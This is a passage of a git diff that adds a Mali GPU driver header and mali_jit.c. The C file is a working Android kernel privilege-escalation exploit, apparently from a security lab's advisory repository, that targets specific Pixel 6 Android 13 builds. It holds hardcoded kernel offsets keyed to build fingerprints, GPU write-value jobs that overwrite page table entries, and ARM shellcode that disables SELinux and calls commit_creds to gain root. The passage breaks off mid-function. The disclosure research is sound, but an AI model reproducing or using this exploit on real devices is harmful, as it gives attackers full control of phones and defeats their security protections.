+ * @BASE_JD_EVENT_JOB_CANCELLED: raised when this atom was hard-stopped or its
+ * dependencies failed
+ * @BASE_JD_EVENT_JOB_INVALID: raised for many reasons, including invalid data
+ * in the atom which overlaps with
+ * BASE_JD_EVENT_JOB_CONFIG_FAULT, or if the
+ * platform doesn't support the feature specified in
+ * the atom.
+ * @BASE_JD_EVENT_PM_EVENT: TODO: remove as it's not used
+ * @BASE_JD_EVENT_TIMED_OUT: TODO: remove as it's not used
+ * @BASE_JD_EVENT_BAG_INVALID: TODO: remove as it's not used
+ * @BASE_JD_EVENT_PROGRESS_REPORT: TODO: remove as it's not used
+ * @BASE_JD_EVENT_BAG_DONE: TODO: remove as it's not used
+ * @BASE_JD_EVENT_DRV_TERMINATED: this is a special event generated to indicate
+ * to userspace that the KBase context has been
+ * destroyed and Base should stop listening for
+ * further events
+ * @BASE_JD_EVENT_REMOVED_FROM_NEXT: raised when an atom that was configured in
+ * the GPU has to be retried (but it has not
+ * started) due to e.g., GPU reset
+ * @BASE_JD_EVENT_END_RP_DONE: this is used for incremental rendering to signal
+ * the completion of a renderpass. This value
+ * shouldn't be returned to userspace but I haven't
+ * seen where it is reset back to JD_EVENT_DONE.
+ *
+ * HW and low-level SW events are represented by event codes.
+ * The status of jobs which succeeded are also represented by
+ * an event code (see @BASE_JD_EVENT_DONE).
+ * Events are usually reported as part of a &struct base_jd_event.
+ *
+ * The event codes are encoded in the following way:
+ * * 10:0 - subtype
+ * * 12:11 - type
+ * * 13 - SW success (only valid if the SW bit is set)
+ * * 14 - SW event (HW event if not set)
+ * * 15 - Kernel event (should never be seen in userspace)
+ *
+ * Events are split up into ranges as follows:
+ * * BASE_JD_EVENT_RANGE__START
+ * * BASE_JD_EVENT_RANGE__END
+ *
+ * code is in 's range when:
+ * BASE_JD_EVENT_RANGE__START <= code <
+ * BASE_JD_EVENT_RANGE__END
+ *
+ * Ranges can be asserted for adjacency by testing that the END of the previous
+ * is equal to the START of the next. This is useful for optimizing some tests
+ * for range.
+ *
+ * A limitation is that the last member of this enum must explicitly be handled
+ * (with an assert-unreachable statement) in switch statements that use
+ * variables of this type. Otherwise, the compiler warns that we have not
+ * handled that enum value.
+ */
+enum base_jd_event_code {
+ /* HW defined exceptions */
+ BASE_JD_EVENT_RANGE_HW_NONFAULT_START = 0,
+
+ /* non-fatal exceptions */
+ BASE_JD_EVENT_NOT_STARTED = 0x00,
+ BASE_JD_EVENT_DONE = 0x01,
+ BASE_JD_EVENT_STOPPED = 0x03,
+ BASE_JD_EVENT_TERMINATED = 0x04,
+ BASE_JD_EVENT_ACTIVE = 0x08,
+
+ BASE_JD_EVENT_RANGE_HW_NONFAULT_END = 0x40,
+ BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_START = 0x40,
+
+ /* job exceptions */
+ BASE_JD_EVENT_JOB_CONFIG_FAULT = 0x40,
+ BASE_JD_EVENT_JOB_POWER_FAULT = 0x41,
+ BASE_JD_EVENT_JOB_READ_FAULT = 0x42,
+ BASE_JD_EVENT_JOB_WRITE_FAULT = 0x43,
+ BASE_JD_EVENT_JOB_AFFINITY_FAULT = 0x44,
+ BASE_JD_EVENT_JOB_BUS_FAULT = 0x48,
+ BASE_JD_EVENT_INSTR_INVALID_PC = 0x50,
+ BASE_JD_EVENT_INSTR_INVALID_ENC = 0x51,
+ BASE_JD_EVENT_INSTR_TYPE_MISMATCH = 0x52,
+ BASE_JD_EVENT_INSTR_OPERAND_FAULT = 0x53,
+ BASE_JD_EVENT_INSTR_TLS_FAULT = 0x54,
+ BASE_JD_EVENT_INSTR_BARRIER_FAULT = 0x55,
+ BASE_JD_EVENT_INSTR_ALIGN_FAULT = 0x56,
+ BASE_JD_EVENT_DATA_INVALID_FAULT = 0x58,
+ BASE_JD_EVENT_TILE_RANGE_FAULT = 0x59,
+ BASE_JD_EVENT_STATE_FAULT = 0x5A,
+ BASE_JD_EVENT_OUT_OF_MEMORY = 0x60,
+ BASE_JD_EVENT_UNKNOWN = 0x7F,
+
+ /* GPU exceptions */
+ BASE_JD_EVENT_DELAYED_BUS_FAULT = 0x80,
+ BASE_JD_EVENT_SHAREABILITY_FAULT = 0x88,
+
+ /* MMU exceptions */
+ BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL1 = 0xC1,
+ BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL2 = 0xC2,
+ BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL3 = 0xC3,
+ BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL4 = 0xC4,
+ BASE_JD_EVENT_PERMISSION_FAULT = 0xC8,
+ BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL1 = 0xD1,
+ BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL2 = 0xD2,
+ BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL3 = 0xD3,
+ BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL4 = 0xD4,
+ BASE_JD_EVENT_ACCESS_FLAG = 0xD8,
+
+ /* SW defined exceptions */
+ BASE_JD_EVENT_MEM_GROWTH_FAILED =
+ BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x000,
+ BASE_JD_EVENT_TIMED_OUT =
+ BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x001,
+ BASE_JD_EVENT_JOB_CANCELLED =
+ BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x002,
+ BASE_JD_EVENT_JOB_INVALID =
+ BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x003,
+ BASE_JD_EVENT_PM_EVENT =
+ BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x004,
+
+ BASE_JD_EVENT_BAG_INVALID =
+ BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_BAG | 0x003,
+
+ BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_END = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_RESERVED | 0x3FF,
+
+ BASE_JD_EVENT_RANGE_SW_SUCCESS_START = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_SUCCESS | 0x000,
+
+ BASE_JD_EVENT_PROGRESS_REPORT = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_JOB | 0x000,
+ BASE_JD_EVENT_BAG_DONE = BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_SUCCESS |
+ BASE_JD_SW_EVENT_BAG | 0x000,
+ BASE_JD_EVENT_DRV_TERMINATED = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_INFO | 0x000,
+
+ BASE_JD_EVENT_RANGE_SW_SUCCESS_END = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_RESERVED | 0x3FF,
+
+ BASE_JD_EVENT_RANGE_KERNEL_ONLY_START = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_KERNEL | 0x000,
+ BASE_JD_EVENT_REMOVED_FROM_NEXT = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_JOB | 0x000,
+ BASE_JD_EVENT_END_RP_DONE = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_JOB | 0x001,
+
+ BASE_JD_EVENT_RANGE_KERNEL_ONLY_END = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_RESERVED | 0x3FF
+};
+
+/**
+ * struct base_jd_event_v2 - Event reporting structure
+ *
+ * @event_code: event code.
+ * @atom_number: the atom number that has completed.
+ * @udata: user data.
+ *
+ * This structure is used by the kernel driver to report information
+ * about GPU events. They can either be HW-specific events or low-level
+ * SW events, such as job-chain completion.
+ *
+ * The event code contains an event type field which can be extracted
+ * by ANDing with BASE_JD_SW_EVENT_TYPE_MASK.
+ */
+struct base_jd_event_v2 {
+ enum base_jd_event_code event_code;
+ base_atom_id atom_number;
+ struct base_jd_udata udata;
+};
+
+/**
+ * struct base_dump_cpu_gpu_counters - Structure for
+ * BASE_JD_REQ_SOFT_DUMP_CPU_GPU_COUNTERS
+ * jobs.
+ * @system_time: gpu timestamp
+ * @cycle_counter: gpu cycle count
+ * @sec: cpu time(sec)
+ * @usec: cpu time(usec)
+ * @padding: padding
+ *
+ * This structure is stored into the memory pointed to by the @jc field
+ * of &struct base_jd_atom.
+ *
+ * It must not occupy the same CPU cache line(s) as any neighboring data.
+ * This is to avoid cases where access to pages containing the structure
+ * is shared between cached and un-cached memory regions, which would
+ * cause memory corruption.
+ */
+
+struct base_dump_cpu_gpu_counters {
+ __u64 system_time;
+ __u64 cycle_counter;
+ __u64 sec;
+ __u32 usec;
+ __u8 padding[36];
+};
+
+#endif /* _UAPI_BASE_JM_KERNEL_H_ */
+
diff --git a/SecurityExploits/Android/Mali/GHSL-2023-005/mali_jit.c b/SecurityExploits/Android/Mali/GHSL-2023-005/mali_jit.c
new file mode 100644
index 0000000..ba87406
--- /dev/null
+++ b/SecurityExploits/Android/Mali/GHSL-2023-005/mali_jit.c
@@ -0,0 +1,659 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include "stdbool.h"
+#include
+#include
+#include
+
+#include "mali.h"
+#include "mali_base_jm_kernel.h"
+#include "midgard.h"
+
+#ifdef SHELL
+#define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__)
+#else
+#include
+#define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__)
+
+#endif //SHELL
+
+#define MALI "/dev/mali0"
+
+#define PAGE_SHIFT 12
+
+#define PFN_DOWN(x) ((x) >> PAGE_SHIFT)
+
+#define FREED_NUM 1
+
+#define FLUSH_SIZE (0x1000 * 0x1000)
+
+#define POOL_SIZE 16384
+
+#define RESERVED_SIZE 32
+
+#define TOTAL_RESERVED_SIZE 1024
+
+#define FLUSH_REGION_SIZE 500
+
+#define GROW_SIZE 0x2000
+
+#define RECLAIM_SIZE (3 * POOL_SIZE)
+
+#define JIT_PAGES 0x1000000
+
+#define JIT_GROUP_ID 1
+
+#define KERNEL_BASE 0x80000000
+
+#define OVERWRITE_INDEX 256
+
+#define ADRP_INIT_INDEX 0
+
+#define ADD_INIT_INDEX 1
+
+#define ADRP_COMMIT_INDEX 2
+
+#define ADD_COMMIT_INDEX 3
+
+#define AVC_DENY_2211 0x8d6810
+
+#define SEL_READ_ENFORCE_2211 0x8ea124
+
+#define INIT_CRED_2211 0x2fd1388
+
+#define COMMIT_CREDS_2211 0x17ada4
+
+#define ADD_INIT_2211 0x910e2000 //add x0, x0, #0x388
+
+#define ADD_COMMIT_2211 0x91369108 //add x8, x8, #0xda4
+
+#define AVC_DENY_2212 0x8ba710
+
+#define SEL_READ_ENFORCE_2212 0x8cdfd4
+
+#define INIT_CRED_2212 0x2fd1418
+
+#define COMMIT_CREDS_2212 0x177ee4
+
+#define ADD_INIT_2212 0x91106000 //add x0, x0, #0x418
+
+#define ADD_COMMIT_2212 0x913b9108 //add x8, x8, #0xee4
+
+#define AVC_DENY_2301 0x8ba710
+
+#define SEL_READ_ENFORCE_2301 0x8cdfd4
+
+#define INIT_CRED_2301 0x2fd1418
+
+#define COMMIT_CREDS_2301 0x177ee4
+
+#define ADD_INIT_2301 0x91106000 //add x0, x0, #0x418
+
+#define ADD_COMMIT_2301 0x913b9108 //add x8, x8, #0xee4
+
+static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2301;
+
+static uint64_t avc_deny = AVC_DENY_2301;
+
+/*
+Overwriting SELinux to permissive
+ strb wzr, [x0]
+ mov x0, #0
+ ret
+*/
+static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0};
+
+static uint32_t root_code[8] = {0};
+
+static uint8_t atom_number = 1;
+static void* flush_regions[FLUSH_REGION_SIZE];
+static uint64_t reclaim_va[RECLAIM_SIZE];
+static uint64_t reserved[TOTAL_RESERVED_SIZE/RESERVED_SIZE];
+static bool commit_failed = false;
+static bool g_ready_commit = false;
+
+struct base_mem_handle {
+ struct {
+ __u64 handle;
+ } basep;
+};
+
+struct base_mem_aliasing_info {
+ struct base_mem_handle handle;
+ __u64 offset;
+ __u64 length;
+};
+
+static int open_dev(char* name) {
+ int fd = open(name, O_RDWR);
+ if (fd == -1) {
+ err(1, "cannot open %s\n", name);
+ }
+ return fd;
+}
+
+uint8_t increase_atom_number() {
+ uint8_t out = atom_number;
+ if (++atom_number == 0) {
+ atom_number++;
+ }
+ return out;
+}
+
+void setup_mali(int fd, int group_id) {
+ struct kbase_ioctl_version_check param = {0};
+ if (ioctl(fd, KBASE_IOCTL_VERSION_CHECK, ¶m) < 0) {
+ err(1, "version check failed\n");
+ }
+ struct kbase_ioctl_set_flags set_flags = {group_id << 3};
+ if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) {
+ err(1, "set flags failed\n");
+ }
+}
+
+void* setup_tracking_page(int fd) {
+ void* region = mmap(NULL, 0x1000, 0, MAP_SHARED, fd, BASE_MEM_MAP_TRACKING_HANDLE);
+ if (region == MAP_FAILED) {
+ err(1, "setup tracking page failed");
+ }
+ return region;
+}
+
+void jit_init(int fd, uint64_t va_pages, uint64_t trim_level, int group_id) {
+ struct kbase_ioctl_mem_jit_init init = {0};
+ init.va_pages = va_pages;
+ init.max_allocations = 255;
+ init.trim_level = trim_level;
+ init.group_id = group_id;
+ init.phys_pages = va_pages;
+
+ if (ioctl(fd, KBASE_IOCTL_MEM_JIT_INIT, &init) < 0) {
+ err(1, "jit init failed\n");
+ }
+}
+
+uint64_t jit_allocate(int fd, uint8_t atom_number, uint8_t id, uint64_t va_pages, uint64_t commit_pages, uint8_t bin_id, uint16_t usage_id, uint64_t gpu_alloc_addr) {
+ struct base_jit_alloc_info info = {0};
+ struct base_jd_atom_v2 atom = {0};
+
+ info.id = id;
+ info.gpu_alloc_addr = gpu_alloc_addr;
+ info.va_pages = va_pages;
+ info.commit_pages = commit_pages;
+ info.extension = 0x1000;
+ info.bin_id = bin_id;
+ info.usage_id = usage_id;
+
+ atom.jc = (uint64_t)(&info);
+ atom.atom_number = atom_number;
+ atom.core_req = BASE_JD_REQ_SOFT_JIT_ALLOC;
+ atom.nr_extres = 1;
+ struct kbase_ioctl_job_submit submit = {0};
+ submit.addr = (uint64_t)(&atom);
+ submit.nr_atoms = 1;
+ submit.stride = sizeof(struct base_jd_atom_v2);
+ if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
+ err(1, "submit job failed\n");
+ }
+ return *((uint64_t*)gpu_alloc_addr);
+}
+
+void jit_free(int fd, uint8_t atom_number, uint8_t id) {
+ uint8_t free_id = id;
+
+ struct base_jd_atom_v2 atom = {0};
+
+ atom.jc = (uint64_t)(&free_id);
+ atom.atom_number = atom_number;
+ atom.core_req = BASE_JD_REQ_SOFT_JIT_FREE;
+ atom.nr_extres = 1;
+ struct kbase_ioctl_job_submit submit = {0};
+ submit.addr = (uint64_t)(&atom);
+ submit.nr_atoms = 1;
+ submit.stride = sizeof(struct base_jd_atom_v2);
+ if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
+ err(1, "submit job failed\n");
+ }
+
+}
+
+void mem_flags_change(int fd, uint64_t gpu_addr, uint32_t flags, int ignore_results) {
+ struct kbase_ioctl_mem_flags_change change = {0};
+ change.flags = flags;
+ change.gpu_va = gpu_addr;
+ change.mask = flags;
+ if (ignore_results) {
+ ioctl(fd, KBASE_IOCTL_MEM_FLAGS_CHANGE, &change);
+ return;
+ }
+ if (ioctl(fd, KBASE_IOCTL_MEM_FLAGS_CHANGE, &change) < 0) {
+ err(1, "flags_change failed\n");
+ }
+}
+
+void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc) {
+ if (ioctl(fd, KBASE_IOCTL_MEM_ALLOC, alloc) < 0) {
+ err(1, "mem_alloc failed\n");
+ }
+}
+
+void mem_alias(int fd, union kbase_ioctl_mem_alias* alias) {
+ if (ioctl(fd, KBASE_IOCTL_MEM_ALIAS, alias) < 0) {
+ err(1, "mem_alias failed\n");
+ }
+}
+
+void mem_query(int fd, union kbase_ioctl_mem_query* query) {
+ if (ioctl(fd, KBASE_IOCTL_MEM_QUERY, query) < 0) {
+ err(1, "mem_query failed\n");
+ }
+}
+
+void mem_commit(int fd, uint64_t gpu_addr, uint64_t pages) {
+ struct kbase_ioctl_mem_commit commit = {.gpu_addr = gpu_addr, pages = pages};
+ if (ioctl(fd, KBASE_IOCTL_MEM_COMMIT, &commit) < 0) {
+ LOG("commit failed\n");
+ commit_failed = true;
+ }
+}
+
+void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group << 22);
+ int prot = PROT_READ;
+ if (!read_only) {
+ alloc.in.flags |= BASE_MEM_PROT_GPU_WR;
+ prot |= PROT_WRITE;
+ }
+ alloc.in.va_pages = va_pages;
+ alloc.in.commit_pages = commit_pages;
+ mem_alloc(mali_fd, &alloc);
+ void* region = mmap(NULL, 0x1000 * va_pages, prot, MAP_SHARED, mali_fd, alloc.out.gpu_va);
+ if (region == MAP_FAILED) {
+ err(1, "mmap failed");
+ }
+ return region;
+}
+
+uint64_t alloc_mem(int mali_fd, unsigned int pages) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR;
+ int prot = PROT_READ | PROT_WRITE;
+ alloc.in.va_pages = pages;
+ alloc.in.commit_pages = pages;
+ mem_alloc(mali_fd, &alloc);
+ return alloc.out.gpu_va;
+}
+
+void free_mem(int mali_fd, uint64_t gpuaddr) {
+ struct kbase_ioctl_mem_free mem_free = {.gpu_addr = gpuaddr};
+ if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) {
+ err(1, "free_mem failed\n");
+ }
+}
+
+uint64_t drain_mem_pool(int mali_fd) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22);
+ int prot = PROT_READ | PROT_WRITE;
+ alloc.in.va_pages = POOL_SIZE;
+ alloc.in.commit_pages = POOL_SIZE;
+ mem_alloc(mali_fd, &alloc);
+ return alloc.out.gpu_va;
+}
+
+void release_mem_pool(int mali_fd, uint64_t drain) {
+ struct kbase_ioctl_mem_free mem_free = {.gpu_addr = drain};
+ if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) {
+ err(1, "free_mem failed\n");
+ }
+}
+
+void* flush(int idx) {
+ void* region = mmap(NULL, FLUSH_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+ if (region == MAP_FAILED) err(1, "flush failed");
+ memset(region, idx, FLUSH_SIZE);
+ return region;
+}
+
+void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
+ for (int i = 0; i < nents; i++) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22);
+ int prot = PROT_READ | PROT_WRITE;
+ alloc.in.va_pages = pages;
+ alloc.in.commit_pages = pages;
+ mem_alloc(mali_fd, &alloc);
+ reserved_va[i] = alloc.out.gpu_va;
+ }
+}
+
+void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
+ for (int i = 0; i < nents; i++) {
+ void* reserved = mmap(NULL, 0x1000 * pages, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, reserved_va[i]);
+ if (reserved == MAP_FAILED) {
+ err(1, "mmap reserved failed");
+ }
+ reserved_va[i] = (uint64_t)reserved;
+ }
+}
+
+uint32_t lo32(uint64_t x) {
+ return x & 0xffffffff;
+}
+
+uint32_t hi32(uint64_t x) {
+ return x >> 32;
+}
+
+uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) {
+ uint64_t pc_page = pc >> 12;
+ uint64_t label_page = label >> 12;
+ int64_t offset = (label_page - pc_page) << 12;
+ int64_t immhi_mask = 0xffffe0;
+ int64_t immhi = offset >> 14;
+ int32_t immlo = (offset >> 12) & 0x3;
+ uint32_t adpr = rd & 0x1f;
+ adpr |= (1 << 28);
+ adpr |= (1 << 31); //op
+ adpr |= immlo << 29;
+ adpr |= (immhi_mask & (immhi << 5));
+ return adpr;
+}
+
+void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit) {
+
+ uint32_t init_adpr = write_adrp(0, read_enforce, init_cred);
+ //Sets x0 to init_cred
+ root_code[ADRP_INIT_INDEX] = init_adpr;
+ root_code[ADD_INIT_INDEX] = add_init;
+ //Sets x8 to commit_creds
+ root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred);
+ root_code[ADD_COMMIT_INDEX] = add_commit;
+ root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10]
+ root_code[5] = 0xd63f0100; // blr x8
+ root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10
+ root_code[7] = 0xd65f03c0; // ret
+}
+
+uint64_t set_addr_lv3(uint64_t addr) {
+ uint64_t pfn = addr >> PAGE_SHIFT;
+ pfn &= ~ 0x1FFUL;
+ pfn |= 0x100UL;
+ return pfn << PAGE_SHIFT;
+}
+
+static inline uint64_t compute_pt_index(uint64_t addr, int level) {
+ uint64_t vpfn = addr >> PAGE_SHIFT;
+ vpfn >>= (3 - level) * 9;
+ return vpfn & 0x1FF;
+}
+
+void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, enum mali_write_value_type type) {
+ void* jc_region = map_gpu(mali_fd, 1, 1, false, 0);
+ struct MALI_JOB_HEADER jh = {0};
+ jh.is_64b = true;
+ jh.type = MALI_JOB_TYPE_WRITE_VALUE;
+
+ struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0};
+ payload.type = type;
+ payload.immediate_value = value;
+ payload.address = gpu_addr;
+
+ MALI_JOB_HEADER_pack((uint32_t*)jc_region, &jh);
+ MALI_WRITE_VALUE_JOB_PAYLOAD_pack((uint32_t*)jc_region + 8, &payload);
+ uint32_t* section = (uint32_t*)jc_region;
+ struct base_jd_atom_v2 atom = {0};
+ atom.jc = (uint64_t)jc_region;
+ atom.atom_number = atom_number;
+ atom.core_req = BASE_JD_REQ_CS;
+ struct kbase_ioctl_job_submit submit = {0};
+ submit.addr = (uint64_t)(&atom);
+ submit.nr_atoms = 1;
+ submit.stride = sizeof(struct base_jd_atom_v2);
+ if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
+ err(1, "submit job failed\n");
+ }
+ usleep(10000);
+}
+
+void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) {
+ uint64_t func_offset = (func + KERNEL_BASE) % 0x1000;
+ uint64_t curr_overwrite_addr = 0;
+ for (int i = 0; i < size; i++) {
+ uint64_t base = reserved[i];
+ uint64_t end = reserved[i] + RESERVED_SIZE * 0x1000;
+ uint64_t start_idx = compute_pt_index(base, 3);
+ uint64_t end_idx = compute_pt_index(end, 3);
+ for (uint64_t addr = base; addr < end; addr += 0x1000) {
+ uint64_t overwrite_addr = set_addr_lv3(addr);
+ if (curr_overwrite_addr != overwrite_addr) {
+ LOG("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset);
+ curr_overwrite_addr = overwrite_addr;
+ for (int code = code_size - 1; code >= 0; code--) {
+ write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], increase_atom_number(), MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
+ }
+ usleep(300000);
+ }
+ }
+ }
+}
+
+int run_enforce() {
+ char result = '2';
+ sleep(3);
+ int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY);
+ read(enforce_fd, &result, 1);
+ close(enforce_fd);
+ LOG("result %d\n", result);
+ return result;
+}
+
+void select_offset() {
+ char fingerprint[256];
+ int len = __system_property_get("ro.build.fingerprint", fingerprint);
+ LOG("fingerprint: %s\n", fingerprint);
+ if (!strcmp(fingerprint, "google/oriole/oriole:13/TP1A.221105.002/9080065:user/release-keys")) {
+ avc_deny = AVC_DENY_2211;
+ sel_read_enforce = SEL_READ_ENFORCE_2211;
+ fixup_root_shell(INIT_CRED_2211, COMMIT_CREDS_2211, SEL_READ_ENFORCE_2211, ADD_INIT_2211, ADD_COMMIT_2211);
+ return;
+ }
+ if (!strcmp(fingerprint, "google/oriole/oriole:13/TQ1A.221205.011/9244662:user/release-keys")) {
+ avc_deny = AVC_DENY_2212;
+ sel_read_enforce = SEL_READ_ENFORCE_2212;
+ fixup_root_shell(INIT_CRED_2212, COMMIT_CREDS_2212, SEL_READ_ENFORCE_2212, ADD_INIT_2212, ADD_COMMIT_2212);
+ return;
+ }
+ if (!strcmp(fingerprint, "google/oriole/oriole:13/TQ1A.230105.002/9325679:user/release-keys")) {
+ avc_deny = AVC_DENY_2301;
+ sel_read_enforce = SEL_READ_ENFORCE_2301;
+ fixup_root_shell(INIT_CRED_2301, COMMIT_CREDS_2301, SEL_READ_ENFORCE_2301, ADD_INIT_2301, ADD_COMMIT_2301);
+ return;
+ }
+ err(1, "unable to match build id\n");
+}
+
+void cleanup(int mali_fd, uint64_t pgd) {
+ write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), 2, increase_atom_number(), MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+}
+
+void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) {
+ uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
+ write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, increase_atom_number(), MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+
+ usleep(100000);
+ //Go through the reserve pages addresses to write to avc_denied with our own shellcode
+ write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t));
+
+ //Triggers avc_denied to disable SELinux
+ open("/dev/kmsg", O_RDONLY);
+
+ uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
+ write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, increase_atom_number(), MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+
+ //Call commit_creds to overwrite process credentials to gain root
+ write_func(mali_fd2, sel_read_enforce, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
+}
+
+void* shrink_jit_mem(void* args) {
+ uint64_t* arguments = (uint64_t*)args;
+ int mali_fd = arguments[0];
+ uint64_t gpu_addr = arguments[1];
+ uint64_t pages = arguments[2];
+ while (!g_ready_commit) {};
+ usleep(10000);
+ mem_commit(mali_fd, gpu_addr, pages);
+ return NULL;
+}
+
+void reclaim_freed_pages(int mali_fd) {
+ for (int i = 0; i < RECLAIM_SIZE; i++) {
+ reclaim_va[i] = (uint64_t)map_gpu(mali_fd, 1, 1, false, JIT_GROUP_ID);
+ uint64_t* this_va = (uint64_t*)(reclaim_va[i]);
+ *this_va = 0;
+ }
+}
+
+uint64_t find_freed_region(int* idx) {
+ *idx = -1;
+ for (int i = 0; i < RECLAIM_SIZE; i++) {
+ uint64_t* this_region = (uint64_t*)(reclaim_va[i]);
+ uint64_t val = *this_region;
+ if (val >= 0x41 && val < 0x41 + FREED_NUM) {
+ *idx = i;
+ return val - 0x41;
+ }
+ }
+ return -1;
+}
+
+int trigger(int mali_fd2) {
+
+ int mali_fd = open_dev(MALI);
+
+ setup_mali(mali_fd, 0);
+
+ void* tracking_page = setup_tracking_page(mali_fd);
+ jit_init(mali_fd, JIT_PAGES, 100, JIT_GROUP_ID);
+
+ g_ready_commit = false;
+ commit_failed = false;
+ atom_number = 1;
+ void* gpu_alloc_addr = map_gpu(mali_fd, 1, 1, false, 0);
+ uint64_t first_jit_id = 1;
+ uint64_t second_jit_id = 2;
+
+ uint64_t jit_addr = jit_allocate(mali_fd, increase_atom_number(), first_jit_id, FREED_NUM, 0, 0, 0, (uint64_t)gpu_alloc_addr);
+ uint64_t jit_addr2 = jit_allocate(mali_fd, increase_atom_number(), second_jit_id, POOL_SIZE * 2, 512 - FREED_NUM, 1, 1, (uint64_t)gpu_alloc_addr);
+
+ if (jit_addr % (512 * 0x1000) != 0 || jit_addr2 < jit_addr || jit_addr2 - jit_addr != FREED_NUM * 0x1000) {
+ LOG("incorrect memory layout\n");
+ LOG("jit_addr %lx %lx\n", jit_addr, jit_addr2);
+ err(1, "incorrect memory layout\n");
+ }
+
+ jit_free(mali_fd, increase_atom_number(), second_jit_id);
+ pthread_t thread;
+ uint64_t args[3];
